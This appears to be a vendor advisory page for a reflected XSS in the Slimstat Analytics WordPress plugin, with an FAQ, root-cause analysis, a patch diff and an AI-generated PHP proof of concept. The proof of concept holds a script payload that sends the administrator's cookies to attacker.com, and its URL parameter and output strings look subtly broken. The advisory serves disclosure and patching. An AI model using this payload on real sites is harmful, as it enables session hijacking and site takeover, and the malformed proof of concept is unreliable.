What is CVE-2025-69323?

CVE-2025-69323 is a reflected cross-site scripting (XSS) vulnerability found in the Slimstat Analytics plugin for WordPress, affecting versions up to and including 5.3.2. It allows unauthenticated attackers to inject arbitrary web scripts into pages, which can execute if a user is tricked into clicking a malicious link.

How does the vulnerability work?

The vulnerability arises from insufficient input sanitization and output escaping in several plugin files. Attackers can craft malicious URLs with specific parameters that exploit the plugin’s handling of user input, allowing them to execute JavaScript in the context of an authenticated administrator’s session.

Who is affected by this vulnerability?

Any WordPress site using the Slimstat Analytics plugin version 5.3.2 or earlier is potentially affected. Site administrators should check their plugin version and update if necessary to mitigate the risk.

How can I check if my site is vulnerable?

To check if your site is vulnerable, navigate to the Plugins section in your WordPress admin dashboard. Look for the Slimstat Analytics plugin and verify its version; if it is 5.3.2 or lower, your site is at risk.

How can I fix or mitigate this issue?

To fix this vulnerability, update the Slimstat Analytics plugin to version 5.3.3 or later, where the issue has been patched. Regularly updating plugins and themes is crucial for maintaining site security.

What does the CVSS score of 6.1 mean?

A CVSS score of 6.1 indicates a medium severity vulnerability. This suggests that while the vulnerability is not the most critical, it still poses a significant risk and should be addressed promptly to prevent potential exploitation.

What are the practical risks of this vulnerability?

If exploited, this vulnerability can allow attackers to execute arbitrary JavaScript in the browser of an authenticated administrator. This could lead to session hijacking, unauthorized administrative access, and the ability to modify site settings or inject malicious content.

How does the proof of concept demonstrate the issue?

The proof of concept illustrates how an attacker can create a malicious link that targets the Slimstat Analytics admin interface. When an authenticated administrator clicks the link, the injected JavaScript executes, demonstrating the reflected XSS vulnerability and its potential impact.

What should I do if I cannot update the plugin immediately?

If immediate updates are not possible, consider disabling the Slimstat Analytics plugin until it can be updated. Additionally, review user permissions to limit access to the admin area and educate users about the risks of clicking unknown links.

Are there any other security measures I should take?

In addition to updating vulnerable plugins, ensure that your WordPress installation, themes, and other plugins are also up to date. Implement security best practices such as using strong passwords, enabling two-factor authentication, and regularly backing up your site.

How can I stay informed about future vulnerabilities?

To stay informed about vulnerabilities, subscribe to security mailing lists, follow WordPress security blogs, and regularly check the CVE database. Engaging with the WordPress community can also provide insights into emerging threats and best practices.

What is reflected cross-site scripting (XSS)?

Reflected cross-site scripting (XSS) is a type of security vulnerability where an attacker injects malicious scripts into web pages viewed by other users. The script is reflected off a web server, typically through a URL, and executed in the user’s browser, potentially leading to data theft or unauthorized actions.

Atomic Edge Proof of Concept automated generator using AI diff analysis

Published : March 18, 2026

CVE-2025-69323: Slimstat Analytics <= 5.3.2 – Reflected Cross-Site Scripting (wp-slimstat)

CVE ID CVE-2025-69323

Plugin wp-slimstat

Severity Medium (CVSS 6.1)

CWE 79

Vulnerable Version 5.3.2

Patched Version 5.3.3

Disclosed January 26, 2026

Analysis Overview

Atomic Edge analysis of CVE-2025-69323:
The Slimstat Analytics WordPress plugin version 5.3.2 and earlier contains a reflected cross-site scripting (XSS) vulnerability. This vulnerability affects multiple administrative interface components. Unauthenticated attackers can inject arbitrary JavaScript via crafted HTTP requests. The CVSS score of 6.1 reflects a medium severity rating with attack vector network and low attack complexity.

Atomic Edge research identifies the root cause as insufficient input sanitization and output escaping across several plugin files. The vulnerability manifests in four distinct code paths. In wp-slimstat/admin/view/index.php line 9, the plugin directly echoes the unsanitized ‘page’ GET parameter from the $_GET array. In wp-slimstat/admin/view/right-now.php lines 251-303, user-controlled data from the $results array (specifically ‘notes’, ‘referer’, ‘content_type’, and ‘outbound_resource’ fields) is processed without proper escaping before being output in HTML contexts. In wp-slimstat/admin/view/wp-slimstat-db.php line 145, POST parameters ‘f’, ‘o’, and ‘v’ are processed with htmlspecialchars but lack proper sanitization before being used as array keys. In wp-slimstat/admin/view/wp-slimstat-reports.php lines 1237-1797, the ‘source’ and ‘cd’ query string parameters from parsed referrer URLs are output without escaping.

Exploitation requires an attacker to trick an authenticated WordPress administrator into clicking a malicious link. The attack vector uses the plugin’s administrative endpoints. For the primary vector, an attacker crafts a URL with a malicious ‘page’ parameter targeting /wp-admin/admin.php?page=slimstat. The payload would be JavaScript code within the parameter value. Secondary vectors involve poisoning the plugin’s data tracking to inject XSS payloads into fields like ‘notes’ or ‘referer’, which then render unsanitized in the admin dashboard. The attacker-controlled data flows through the plugin’s reporting and display functions without adequate output encoding.

The patch addresses the vulnerability through multiple coordinated fixes. In index.php, the code now validates the existence of the ‘page’ parameter with isset(), sanitizes it using sanitize_key(), and escapes the output with esc_html(). In right-now.php, the patch adds esc_html() to the ‘notes’ field before string replacement operations and applies esc_url() and esc_html() to URL and text outputs for ‘referer’, ‘content_type’, and ‘outbound_resource’ fields. User note strings for login/logout events also receive esc_html() wrapping. In wp-slimstat-db.php, htmlspecialchars() is replaced with sanitize_text_field() for all POST parameters. In wp-slimstat-reports.php, esc_html() is applied to the ‘outbound_resource’ column output and to the ‘source’ and ‘cd’ query parameters parsed from referrer URLs. The plugin version in wp-slimstat.php is updated to 5.3.3, and sanitize_url() is added to the ‘resource’ parameter in the slimtrack() function.

Successful exploitation allows attackers to execute arbitrary JavaScript in the context of an authenticated administrator’s browser session. This can lead to session hijacking, administrative account takeover, and complete site compromise. Attackers could create new administrative accounts, modify plugin settings, inject backdoors, or redirect visitors to malicious sites. The vulnerability specifically affects the plugin’s administrative interface, giving attackers direct access to privileged WordPress functionality.

Differential between vulnerable and patched code

Code Diff

--- a/wp-slimstat/admin/view/index.php
+++ b/wp-slimstat/admin/view/index.php
@@ -9,7 +9,7 @@

 <div class="backdrop-container">
     <div class="wrap slimstat">
-        <h2><?php echo wp_slimstat_admin::$screens_info[$_GET['page']]['title'] ?></h2>
+        <h2><?php echo isset($_GET['page']) && isset(wp_slimstat_admin::$screens_info[sanitize_key($_GET['page'])]) ? esc_html(wp_slimstat_admin::$screens_info[sanitize_key($_GET['page'])]['title']) : '' ?></h2>

         <div class="notice slimstat-notice slimstat-tooltip-content" style="background-color:#ffa;border:0;padding:10px"><?php _e('<strong>AdBlock browser extension detected</strong> - If you see this notice, it means that your browser is not loading our stylesheet and/or Javascript files correctly. This could be caused by an overzealous ad blocker feature enabled in your browser (AdBlock Plus and friends). <a href="https://wp-slimstat.com/resources/the-reports-are-not-being-rendered-correctly-or-buttons-do-not-work" target="_blank">Please make sure to add an exception</a> to your configuration and allow the browser to load these assets.', 'wp-slimstat'); ?></div>

--- a/wp-slimstat/admin/view/right-now.php
+++ b/wp-slimstat/admin/view/right-now.php
@@ -251,7 +251,8 @@
     // Pageview Notes
     $notes = '';
     if (is_admin() && !empty($results[$i]['notes'])) {
-        $notes = str_replace(['][', ':', '[', ']'], ['<br/>', ': ', '', ''], $results[$i]['notes']);
+        $notes = esc_html($results[$i]['notes']);
+        $notes = str_replace(['][', ':', '[', ']'], ['<br/>', ': ', '', ''], $notes);
         $notes = sprintf("<i class='slimstat-font-edit slimstat-tooltip-trigger'><b class='slimstat-tooltip-content'>%s</b></i>", $notes);
     }

@@ -264,15 +265,15 @@
     if (!$is_dashboard) {
         $domain                      = parse_url($results[$i]['referer'] ?: '');
         $domain                      = empty($domain['host']) ? __('Invalid Referrer', 'wp-slimstat') : $domain['host'];
-        $results[$i]['referer']      = (!empty($results[$i]['referer']) && empty($results[$i]['searchterms'])) ? "<a class='spaced slimstat-font-login slimstat-tooltip-trigger' target='_blank' title='" . htmlentities(__('Open this referrer in a new window', 'wp-slimstat'), ENT_QUOTES, 'UTF-8') . sprintf("' href='%s'></a> %s", $results[$i]['referer'], $domain) : '';
-        $results[$i]['content_type'] = empty($results[$i]['content_type']) ? '' : "<i class='spaced slimstat-font-doc slimstat-tooltip-trigger' title='" . __('Content Type', 'wp-slimstat') . "'></i> <a class='slimstat-filter-link' href='" . wp_slimstat_reports::fs_url('content_type equals ' . $results[$i]['content_type']) . sprintf("'>%s</a> ", $results[$i]['content_type']);
+        $results[$i]['referer']      = (!empty($results[$i]['referer']) && empty($results[$i]['searchterms'])) ? "<a class='spaced slimstat-font-login slimstat-tooltip-trigger' target='_blank' title='" . htmlentities(__('Open this referrer in a new window', 'wp-slimstat'), ENT_QUOTES, 'UTF-8') . sprintf("' href='%s'></a> %s", esc_url($results[$i]['referer']), esc_html($domain)) : '';
+        $results[$i]['content_type'] = empty($results[$i]['content_type']) ? '' : "<i class='spaced slimstat-font-doc slimstat-tooltip-trigger' title='" . __('Content Type', 'wp-slimstat') . "'></i> <a class='slimstat-filter-link' href='" . wp_slimstat_reports::fs_url('content_type equals ' . $results[$i]['content_type']) . sprintf("'>%s</a> ", esc_html($results[$i]['content_type']));

         // The Outbound Links field might contain more than one link
         if (!empty($results[$i]['outbound_resource'])) {
             if ('#' !== substr($results[$i]['outbound_resource'], 0, 1)) {
-                $results[$i]['outbound_resource'] = "<a class='inline-icon spaced slimstat-font-logout slimstat-tooltip-trigger' target='_blank' title='" . htmlentities(__('Open this outbound link in a new window', 'wp-slimstat'), ENT_QUOTES, 'UTF-8') . sprintf("' href='%s'></a> %s", $results[ $i ][ 'outbound_resource' ], $results[ $i ][ 'outbound_resource' ]);
+                $results[$i]['outbound_resource'] = "<a class='inline-icon spaced slimstat-font-logout slimstat-tooltip-trigger' target='_blank' title='" . htmlentities(__('Open this outbound link in a new window', 'wp-slimstat'), ENT_QUOTES, 'UTF-8') . sprintf("' href='%s'></a> %s", esc_url($results[ $i ][ 'outbound_resource' ]), esc_html($results[ $i ][ 'outbound_resource' ]));
             } else {
-                $results[$i]['outbound_resource'] = "<i class='inline-icon spaced slimstat-font-logout'></i> " . $results[ $i ][ 'outbound_resource' ];
+                $results[$i]['outbound_resource'] = "<i class='inline-icon spaced slimstat-font-logout'></i> " . esc_html($results[ $i ][ 'outbound_resource' ]);
             }
         } else {
             $results[$i]['outbound_resource'] = '';
@@ -291,7 +292,7 @@
                     continue;
                 }

-                $login_logout .= "<i class='slimstat-font-user-plus spaced slimstat-tooltip-trigger' title='" . __('User Logged In', 'wp-slimstat') . "'></i> " . str_replace('loggedin:', '', $a_note);
+                $login_logout .= "<i class='slimstat-font-user-plus spaced slimstat-tooltip-trigger' title='" . __('User Logged In', 'wp-slimstat') . "'></i> " . esc_html(str_replace('loggedin:', '', $a_note));
             }
         }

@@ -302,7 +303,7 @@
                     continue;
                 }

-                $login_logout .= "<i class='slimstat-font-user-times spaced slimstat-tooltip-trigger' title='" . __('User Logged Out', 'wp-slimstat') . "'></i> " . str_replace('loggedout:', '', $a_note);
+                $login_logout .= "<i class='slimstat-font-user-times spaced slimstat-tooltip-trigger' title='" . __('User Logged Out', 'wp-slimstat') . "'></i> " . esc_html(str_replace('loggedout:', '', $a_note));
             }
         }
     } else {
--- a/wp-slimstat/admin/view/wp-slimstat-db.php
+++ b/wp-slimstat/admin/view/wp-slimstat-db.php
@@ -145,7 +145,7 @@

         // Fields and drop downs
         if (!empty($_POST['f']) && !empty($_POST['o'])) {
-            $filters_array[htmlspecialchars($_POST['f'])] = sprintf('%s %s ', $_POST[ 'f' ], $_POST[ 'o' ]) . ($_POST['v'] ?? '');
+            $filters_array[sanitize_text_field($_POST['f'])] = sprintf('%s %s ', sanitize_text_field($_POST[ 'f' ]), sanitize_text_field($_POST[ 'o' ])) . (isset($_POST['v']) ? sanitize_text_field($_POST['v']) : '');
         }

         // Filters set via the plugin options
--- a/wp-slimstat/admin/view/wp-slimstat-reports.php
+++ b/wp-slimstat/admin/view/wp-slimstat-reports.php
@@ -1237,6 +1237,10 @@
                         $element_value = str_replace(['<', '>'], ['<', '>'], urldecode($results[$i][$_args['columns']]));
                         break;

+                    case 'outbound_resource':
+                        $element_value = esc_html($results[$i][$_args['columns']]);
+                        break;
+
                     case 'resource':
                         $resource_title = self::get_resource_title($results[$i][$_args['columns']]);
                         if ($resource_title != $results[$i][$_args['columns']]) {
@@ -1793,11 +1797,11 @@
         parse_str($_referer, $query_parse_str);

         if (isset($query_parse_str['source']) && ([] !== $query_parse_str['source'] && ('' !== $query_parse_str['source'] && '0' !== $query_parse_str['source'])) && !$_serp_only) {
-            $query_details = __('src', 'wp-slimstat') . (': ' . $query_parse_str[ 'source' ]);
+            $query_details = __('src', 'wp-slimstat') . (': ' . esc_html($query_parse_str[ 'source' ]));
         }

         if (isset($query_parse_str['cd']) && ('' !== $query_parse_str['cd'] && '0' !== $query_parse_str['cd'] && [] !== $query_parse_str['cd'])) {
-            $query_details = __('serp', 'wp-slimstat') . (': ' . $query_parse_str[ 'cd' ]);
+            $query_details = __('serp', 'wp-slimstat') . (': ' . esc_html($query_parse_str[ 'cd' ]));
         }

         if ('' !== $query_details && '0' !== $query_details) {
--- a/wp-slimstat/vendor/composer/autoload_static.php
+++ b/wp-slimstat/vendor/composer/autoload_static.php
@@ -12,14 +12,14 @@
     );

     public static $prefixLengthsPsr4 = array (
-        'S' =>
+        'S' =>
         array (
             'SlimStat\' => 9,
         ),
     );

     public static $prefixDirsPsr4 = array (
-        'SlimStat\' =>
+        'SlimStat\' =>
         array (
             0 => __DIR__ . '/../..' . '/src',
         ),
--- a/wp-slimstat/wp-slimstat.php
+++ b/wp-slimstat/wp-slimstat.php
@@ -3,7 +3,7 @@
  * Plugin Name: SlimStat Analytics
  * Plugin URI: https://wp-slimstat.com/
  * Description: The leading web analytics plugin for WordPress
- * Version: 5.3.2
+ * Version: 5.3.3
  * Author: Jason Crouse, VeronaLabs
  * Text Domain: wp-slimstat
  * Domain Path: /languages
@@ -24,7 +24,7 @@
 }

 // Set the plugin version and directory
-define('SLIMSTAT_ANALYTICS_VERSION', '5.3.2');
+define('SLIMSTAT_ANALYTICS_VERSION', '5.3.3');
 define('SLIMSTAT_FILE', __FILE__);
 define('SLIMSTAT_DIR', __DIR__);
 define('SLIMSTAT_URL', plugins_url('', __FILE__));
@@ -276,7 +276,7 @@
                         $id = self::slimtrack();
                     } // .. or outbound link? If so, update the pageview with the new info
                     elseif ($parsed_resource['host'] != $site_host) {
-                        self::$stat['outbound_resource'] = $resource;
+                        self::$stat['outbound_resource'] = sanitize_url($resource);

                         // Visitor is still on this page, record the timestamp in the corresponding field
                         self::$stat['dt_out'] = self::date_i18n('U');

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

PHP PoC

// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept
// CVE-2025-69323 - Slimstat Analytics <= 5.3.2 - Reflected Cross-Site Scripting
<?php
/**
 * Proof of Concept for CVE-2025-69323
 * Targets the 'page' parameter reflected XSS vulnerability in Slimstat Analytics admin interface
 * Requires an authenticated administrator to click the generated malicious link
 */

$target_url = 'http://vulnerable-wordpress-site.com/wp-admin/admin.php';

// Malicious JavaScript payload to demonstrate XSS
// This payload creates a visible alert and attempts to steal the administrator's cookies
$payload = rawurlencode("<script>alert('XSS via CVE-2025-69323');document.location='http://attacker.com/steal?c='+encodeURIComponent(document.cookie);</script>");

// Construct the malicious URL targeting the Slimstat Analytics admin page
// The 'page' parameter must match a valid Slimstat screen for the code path to execute
$malicious_url = $target_url . '?page=slimstat&slimstat[page]=' . $payload;

echo "Atomic Edge CVE-2025-69323 Proof of Conceptn";
echo "============================================nn";
echo "Target URL: $target_urln";
echo "Vulnerable Parameter: 'page' GET parametern";
echo "Vulnerable File: /wp-slimstat/admin/view/index.phpn";
echo "nGenerated Malicious URL:n";
echo "$malicious_urlnn";
echo "Exploitation Instructions:n";
echo "1. Ensure the target site runs Slimstat Analytics <= 5.3.2n";
echo "2. An authenticated WordPress administrator must click the above URLn";
echo "3. The JavaScript payload will execute in the administrator's browsern";
echo "4. Check attacker server logs for stolen session cookiesnn";

// Optional: Use cURL to verify the endpoint is accessible
// This does NOT trigger the XSS as it doesn't execute JavaScript
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $target_url . '?page=slimstat');
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_HEADER, true);
curl_setopt($ch, CURLOPT_NOBODY, true);
curl_setopt($ch, CURLOPT_TIMEOUT, 5);
$response = curl_exec($ch);
$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
curl_close($ch);

if ($http_code == 200 || $http_code == 302) {
    echo "[+] Target admin endpoint appears accessible (HTTP $http_code)n";
} else {
    echo "[-] Target admin endpoint may not be accessible (HTTP $http_code)n";
}
?>

Frequently Asked Questions

What is CVE-2025-69323?
Overview of the vulnerability
CVE-2025-69323 is a reflected cross-site scripting (XSS) vulnerability found in the Slimstat Analytics plugin for WordPress, affecting versions up to and including 5.3.2. It allows unauthenticated attackers to inject arbitrary web scripts into pages, which can execute if a user is tricked into clicking a malicious link.
How does the vulnerability work?
Mechanics of the exploitation
The vulnerability arises from insufficient input sanitization and output escaping in several plugin files. Attackers can craft malicious URLs with specific parameters that exploit the plugin’s handling of user input, allowing them to execute JavaScript in the context of an authenticated administrator’s session.
Who is affected by this vulnerability?
Identifying vulnerable users
Any WordPress site using the Slimstat Analytics plugin version 5.3.2 or earlier is potentially affected. Site administrators should check their plugin version and update if necessary to mitigate the risk.
How can I check if my site is vulnerable?
Verifying plugin versions
To check if your site is vulnerable, navigate to the Plugins section in your WordPress admin dashboard. Look for the Slimstat Analytics plugin and verify its version; if it is 5.3.2 or lower, your site is at risk.
How can I fix or mitigate this issue?
Steps to secure your site
To fix this vulnerability, update the Slimstat Analytics plugin to version 5.3.3 or later, where the issue has been patched. Regularly updating plugins and themes is crucial for maintaining site security.
What does the CVSS score of 6.1 mean?
Understanding risk levels
A CVSS score of 6.1 indicates a medium severity vulnerability. This suggests that while the vulnerability is not the most critical, it still poses a significant risk and should be addressed promptly to prevent potential exploitation.
What are the practical risks of this vulnerability?
Potential consequences of exploitation
If exploited, this vulnerability can allow attackers to execute arbitrary JavaScript in the browser of an authenticated administrator. This could lead to session hijacking, unauthorized administrative access, and the ability to modify site settings or inject malicious content.
How does the proof of concept demonstrate the issue?
Understanding the exploit example
The proof of concept illustrates how an attacker can create a malicious link that targets the Slimstat Analytics admin interface. When an authenticated administrator clicks the link, the injected JavaScript executes, demonstrating the reflected XSS vulnerability and its potential impact.
What should I do if I cannot update the plugin immediately?
Temporary mitigation strategies
If immediate updates are not possible, consider disabling the Slimstat Analytics plugin until it can be updated. Additionally, review user permissions to limit access to the admin area and educate users about the risks of clicking unknown links.
Are there any other security measures I should take?
Enhancing overall site security
In addition to updating vulnerable plugins, ensure that your WordPress installation, themes, and other plugins are also up to date. Implement security best practices such as using strong passwords, enabling two-factor authentication, and regularly backing up your site.
How can I stay informed about future vulnerabilities?
Keeping up with security updates
To stay informed about vulnerabilities, subscribe to security mailing lists, follow WordPress security blogs, and regularly check the CVE database. Engaging with the WordPress community can also provide insights into emerging threats and best practices.
What is reflected cross-site scripting (XSS)?
Defining the attack type
Reflected cross-site scripting (XSS) is a type of security vulnerability where an attacker injects malicious scripts into web pages viewed by other users. The script is reflected off a web server, typically through a URL, and executed in the user’s browser, potentially leading to data theft or unauthorized actions.

How Atomic Edge Works

Simple Setup. Powerful Security.

Atomic Edge acts as a security layer between your website & the internet. Our AI inspection and analysis engine auto blocks threats before traditional firewall services can inspect, research and build archaic regex filters.

Get Started

Trusted by Developers & Organizations